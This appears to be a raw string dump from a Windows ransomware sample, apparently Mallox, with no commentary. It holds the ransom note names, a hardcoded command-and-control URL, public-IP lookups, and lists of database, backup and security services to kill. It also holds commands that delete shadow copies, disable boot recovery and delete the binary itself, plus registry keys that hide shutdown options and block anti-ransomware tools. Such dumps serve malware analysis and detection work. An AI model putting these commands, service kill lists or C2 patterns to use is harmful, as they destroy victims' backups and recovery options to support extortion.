api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
UTF-16LEUNICODE
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
gmsocache
$windows.~ws
system volume information
appdata
perflogs
programdata
google
application data
tor browser
$windows.~bt
mozilla
windows.old
Windows Microsoft.NET
WindowsPowerShell
Windows NT
Windows
Common Files
Microsoft Security Client
Internet Explorer
Reference
Assemblies
Windows Defender
Microsoft ASP.NET
Core Runtime
Package
Microsoft Help Viewer
Microsoft MPI
Windows Kits
Microsoft.NET
Windows Mail
Package Store
Microsoft Analysis Services
Windows Portable Devices
Windows Photo Viewer
Windows Sidebar
.msstyles
.avast
.mallox
.nomedia
.Globeimposter-Alpha865qqz
.diangcab
.theme
.diagcfg
.diagpkg
.deskthemepack
.themepack
.rmallox
desktop.ini
ntuser.dat
thumbs.db
iconcache.db
ntuser.ini
bootfont.bin
ntuser.dat.log
bootsect.bak
boot.ini
autorun.inf
debugLog.txt
TargetInfo.txt
sqlserv.exe
oracle.exe
ntdbsmgr.exe
sqlservr.exe
sqlwriter.exe
MsDtsSrvr.exe
msmdsrv.exe
ReportingServecesService.exe
fdhost.exe
fdlauncher.exe
mysql.exe
Small size: %s
SiebelApplicationContainer_Siebel_Home_d_Siebel_sai
ReportServer$SQLEXPRESS
SQL Server Reporting Services
SQL Server (MSSQLSERVER)
MSSQLFDLauncher
SQLSERVERAGENT
SQLBrowser
SQLTELEMETRY
MsDtsServer130
SSISTasdRY130
MSSQL$WOLTERSKLUWER
SQLAgent$PROGID
SQLWriter
MSSQL$VEEAMSQL2012
SQLAgent$VEEAMSQL2012
SQLAgent
MSSQLServerADHelper100
MSSQLServerOLAPService
MsDtsServer100
ReportServer
SQLTELEMETRY$HL
TMBMServer
MSSQL$PROGID
XT800Service_Personal
AHS SERVICE
Sense Shield Service
FontCache3.0.0.0
OSP Service
DAService_TCP
eCard-TTransServer
wanxiao-monitor
vm-agent
SyncBASE Service
Flash Helper Service
Kiwi Syslog Server
UWS HiPriv Services
UWS LoPriv Services
UtilDev Web Server Pro
ZTE USBIP Client Guard
ZTE USBIP Client
ZTE FileTranS
Zabbix Agent
EasyFZS Server
Rpc Monitor
Nuo Update Monitor
Daemon Service
FlexNet Licensing Service 64
U8WorkerService2
U8MPool
U8WebPool
U8WorkerService1
TongBackupSrv
cbVSCService11
CobianBackup11
MSSQLSERVER
MSSQL$
MSSQL$FE_EXPRESS
SQLANYs_Sage_FAS_Fixed_Assets
MSSQL$VIM_SQLEXP
QcSoftService
VMTools
VGAuthService
TeamViewer
RabbitMQ
SSMonitorService
SSSyncService
TPlusStdAppService1300
MSSQL$SQL2008
SQLAgent$SQL2008
TPlusStdTaskService1300
TPlusStdUpgradeService1300
VirboxWebServer
jhi_service
eCardMPService
EnergyDataService
UI0Detect
K3MobileService
TCPIDDAService
WebAttendServer
UIODetect
VMAuthdService
VMUSBArbService
VMwareHostd
VmAgentDaemon
OpenSSHd
eSightService
apachezt
Jenkins
secbizsrv
smtpsvrJT
zyb_sync
360EntHttpServer
360EntSvc
360EntClientSvc
NFWebServer
wampapache
MSSEARCH
msftesql
OracleDBConcoleorcl
OracleJobSchedulerORCL
OracleMTSRecoveryService
OracleOraDb11g_home1ClrAgent
OracleOraDb11g_home1TNSListener
OracleVssWriterORCL
OracleServiceORCL
aspnet_state
JhTask
ImeDictUpdateService
MCService
allpass_redisservice_port21160
ftnlsv3
ftnlses3
FxService
ftusbrdwks
ftusbrdsrv
wwbizsrv
qemu-ga
AlibabaProtect
ZTEVdservice
kbasesrv
MMRHookService
IpOverUsbSvc
KuaiYunTools
KMSELDI
btPanel
Protect_2345Explorer
2345PicSvc
vmware-converter-agent
vmware-converter-server
vmware-converter-worker
QQCertificateService
OracleRemExecService
GPSDaemon
GPSUserSvr
GPSDownSvr
GPSStorageSvr
GPSDataProcSvr
GPSGatewaySvr
GPSMediaSvr
GPSLoginSvr
GPSTomcat6
GPSMysqld
GPSFtpd
BackupExecAgentAccelerator
BackupExecDeviceMediaService
BackupExecRPCService
BackupExecAgentBrowser
BackupExecJobEngine
BackupExecManagementService
TxQBService
Gailun_Downloader
RemoteAssistService
YunService
Serv-U
OpenFastAssist
asComSvc
OfficeUpdateService
RtcSrv
RTCASMCU
MASTER
NscAuthService
MSCRMUnzipService
MSCRMAsyncService$maintenance
MSCRMAsyncService
REPLICA
RTCATS
RTCAVMCU
RtcQms
RTCMEETINGMCU
RTCIMMCU
RTCDATAMCU
RTCCDR
ProjectEventService16
ProjectQueueService16
SPAdminV4
SPSearchHostController
SPTimerV4
SPTraceV4
OSearch16
ProjectCalcService16
AppFabricCachingService
MotionBoard57
MotionBoardRCService57
vsvnjobsvc
VisualSVNServer
BestSyncSvc
LPManager
MediatekRegistryWriter
RaAutoInstSrv_RT2870
CobianBackup10
SQLANYs_sem5
CASLicenceServer
SQLService
semwebsrv
TbossSystem
ErpEnvSvc
Mysoft.Autoupgrade.DispatchService
Mysoft.Autoupgrade.UpdateService
Mysoft.Config.WindowsService
Mysoft.DataCenterService
Mysoft.SchedulingService
Mysoft.Setup.InstallService
MysoftUpdate
edr_monitor
abs_deployer
savsvc
ShareBoxMonitorService
ShareBoxService
CloudExchangeService
EASService
KICkSvr
U8SmsSrv
OfficeClearCache
TurboCRM70
U8DispatchService
U8EISService
U8EncryptService
U8GCService
U8KeyManagePool
U8SCMPool
U8SLReportService
U8TaskService
UFAllNet
UFReportService
UTUService
.nvram
.oraenv
cmd.exe
admin$
%windir%
\\%s\%s\%s.exe
%s\%s.exe
HOW TO BACK FILES.txt
\\%s\%s
\\.\%c:
http://api.ipify.org
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
http://91.215.85.135/QWEwqdsvsf/ap.php
Content-Type: application/x-www-form-urlencoded
Host:
/c ping 127.0.0.1 && del "%s" >> NUL
-queue
File not found OR Invalid argument
Cant create unique data...
C:\HOW TO RECOVER !!.TXT
/c bcdedit /set {current} bootstatuspolicy ignoreallfailures
/c bcdedit /set {current} recoveryenabled no
SeTakeOwnershipPrivilege
SeDebugPrivilege
window
Do NOT shutdown OR reboot your PC: this might damage your files permanently !
SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown
SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart
SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut
shutdownwithoutlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
MaxConnectionTime
SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
MaxDisconnectionTime
MaxIdleTime
C:\Windows
\sysnative\vssadmin.exe
delete shadows /all /quiet
SOFTWARE\Raccine
SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
Read Error: %s
chunk_temp lower than ...
Set pos error: %s
Write error: %s
No permission: %s
In use another process: %s
Cant open: %s
%s: ReadFile code: %lu
%s: WriteFile code: %lu
%s: SetPos code: %lu